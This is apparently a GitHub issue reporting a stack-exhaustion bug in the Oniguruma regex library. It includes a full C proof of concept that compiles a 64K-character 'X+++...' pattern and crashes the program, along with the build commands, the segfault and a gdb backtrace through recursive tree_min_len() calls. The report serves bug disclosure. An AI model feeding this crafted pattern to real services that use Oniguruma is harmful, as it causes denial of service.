Skip to content

Stack Exhaustion Problem caused by some parsing functions in regcomp.c making recursive calls to themselves. #147

Closed
@RKX1209

Description

@RKX1209

If Oniguruma tries to parse a very deeply nested regex, it exhausts the stack (stack overflow) because some parsing functions, such as optimize_nodes() and tree_min_len(), call themselves recursively once per nesting level.

Here is PoC source code that simply compiles a very large regular expression "X+++++++++++++++++++++++++++++++ .... " and then runs onig_search() with it.

/*
 * oniguruma_stack.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "oniguruma.h"

/*
 * Compile `apattern` with the given syntax (ASCII encoding, default options),
 * search the whole of `astr` for it, and report the outcome on stderr.
 *
 * Both `apattern` and `astr` must be NUL-terminated: their lengths are taken
 * with strlen().
 *
 * Returns 0 when the search completed (match or mismatch), -1 when the
 * pattern failed to compile, the region could not be allocated, or the
 * search itself reported an error.
 */
extern int exec(OnigSyntaxType* syntax, char* apattern, char* astr)
{
  int r;
  unsigned char *start, *range, *end;
  regex_t* reg;
  OnigErrorInfo einfo;
  OnigRegion *region;
  UChar* pattern = (UChar* )apattern;
  UChar* str     = (UChar* )astr;

  r = onig_new(&reg, pattern, pattern + strlen((char* )pattern),
               ONIG_OPTION_DEFAULT, ONIG_ENCODING_ASCII, syntax, &einfo);
  if (r != ONIG_NORMAL) {
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\n", s);
    return -1;
  }

  region = onig_region_new();
  if (region == NULL) {
    /* onig_region_new() returns NULL when it cannot allocate; without this
       check the match branch below would dereference a NULL region. */
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, ONIGERR_MEMORY);
    fprintf(stderr, "ERROR: %s\n", s);
    onig_free(reg);
    return -1;
  }

  /* Search forward over the entire subject string. */
  end   = str + strlen((char* )str);
  start = str;
  range = end;
  r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE);
  if (r >= 0) {
    int i;

    /* r is the match position; dump every capture group's byte range. */
    fprintf(stderr, "match at %d\n", r);
    for (i = 0; i < region->num_regs; i++) {
      fprintf(stderr, "%d: (%d-%d)\n", i, region->beg[i], region->end[i]);
    }
  }
  else if (r == ONIG_MISMATCH) {
    fprintf(stderr, "search fail\n");
  }
  else { /* error */
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r);
    fprintf(stderr, "ERROR: %s\n", s);
    onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
    onig_free(reg);
    return -1;
  }

  onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
  onig_free(reg);
  return 0;
}

#define REGEX_SZ 0x10000

/*
 * Build the pattern "X" followed by a long run of '+' quantifiers and feed it
 * to exec() against the subject "bgc".
 *
 * Returns whatever exec() returns.
 */
extern int main(int argc, char* argv[])
{
  int r, i;

  OnigEncoding use_encs[] = { ONIG_ENCODING_ASCII };
  char regex[REGEX_SZ] = {0};
  regex[0] = 'X';
  /* Stop one byte short of the end so the final element keeps its '\0':
     exec() measures the pattern with strlen(), which would otherwise read
     past the array. */
  for (i = 1; i < REGEX_SZ - 1; i++) regex[i] = '+';

  onig_initialize(use_encs, sizeof(use_encs)/sizeof(use_encs[0]));

  r = exec(ONIG_SYNTAX_RUBY, regex, "bgc");

  onig_end();
  return r;
}
gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
./oniguruma_stack
Segmentation fault (core dumped)
gdb -q ./oniguruma_stack -c core
Reading symbols from ./oniguruma_stack...done.                                        
[New LWP 19257]                                                                       
Core was generated by `./oniguruma_stack'.                                            
Program terminated with signal SIGSEGV, Segmentation fault.                           
#0  0x00007fe64f65fde5 in tree_min_len (                                              
    node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
    env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
    at regcomp.c:2839                                                                 
2839    {                                                                             
(gdb) bt                    
#0  0x00007fe64f65fde5 in tree_min_len (                                              
    node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
    env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
    at regcomp.c:2839
#1  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
    at regcomp.c:2942
#2  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#3  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
    at regcomp.c:2942
#4  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
    at regcomp.c:2913
#5  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
    at regcomp.c:2942
#6  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#7  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
    at regcomp.c:2942
#8  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
    at regcomp.c:2913
#9  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
    at regcomp.c:2942
#10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
    at regcomp.c:2913
#11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
    at regcomp.c
....

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions